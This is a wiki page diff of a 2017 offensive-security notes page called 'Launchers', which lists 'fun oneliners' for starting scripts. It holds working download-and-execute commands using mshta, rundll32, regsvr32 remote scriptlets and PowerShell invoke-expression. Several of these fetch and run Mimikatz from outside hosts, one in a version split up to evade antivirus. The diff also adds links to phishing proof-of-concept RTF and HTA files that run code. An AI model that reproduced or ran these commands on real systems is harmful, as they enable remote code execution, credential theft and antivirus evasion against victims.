Launchers: Difference between revisions
Jump to navigation
Jump to search
No edit summary (change visibility) |
No edit summary (change visibility) |
||
Line 21: | Line 21: | ||
</syntaxhighlight> | </syntaxhighlight> | ||
https://github.com/subTee/DerbyCon2016/blob/master/scrat.ps1 | https://github.com/subTee/DerbyCon2016/blob/master/scrat.ps1 | ||
=phishing docs= | |||
* Credits.rtf - https://mendelonline.be/security/poc/Credits.rtf - run mshta from rtf | |||
* "Show information.hta" - https://mendelonline.be/security/poc/Show%20information.hta - run code from hta file | |||
=more= | =more= | ||
* subtee's gist's: https://gist.github.com/subTee | * subtee's gist's: https://gist.github.com/subTee |
Revision as of 14:18, 18 April 2017
Some fun oneliners to start a script
mshta.exe vbscript:GetObject("script:https://server/sct")(window.close)
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject('WScript.Shell');w.Exec('calc')");
https://twitter.com/ch33kyf3ll0w/status/816319597645328384 https://gist.github.com/subTee/62fc28bb5dc58dbe9efdd56d65921bd2
#runs mimikatz straight from github
invoke-expression (Invoke-WebRequest -Uri https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1).content;invoke-mimikatz
#runs mimikatz with split-up custom version to evade antivirus
invoke-expression (Invoke-WebRequest -Uri https://mendelonline.be/security/poc/test.code.txt).content;invoke-bananas
#starts calc
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test.sct scrobj.dll
#starts powershell that runs mimikatz
regsvr32 /u /n /s /i:https://mendelonline.be/security/poc/test2.sct scrobj.dll
https://github.com/subTee/DerbyCon2016/blob/master/scrat.ps1
phishing docs
- Credits.rtf - https://mendelonline.be/security/poc/Credits.rtf - run mshta from rtf
- "Show information.hta" - https://mendelonline.be/security/poc/Show%20information.hta - run code from hta file
more
- subtee's gist's: https://gist.github.com/subTee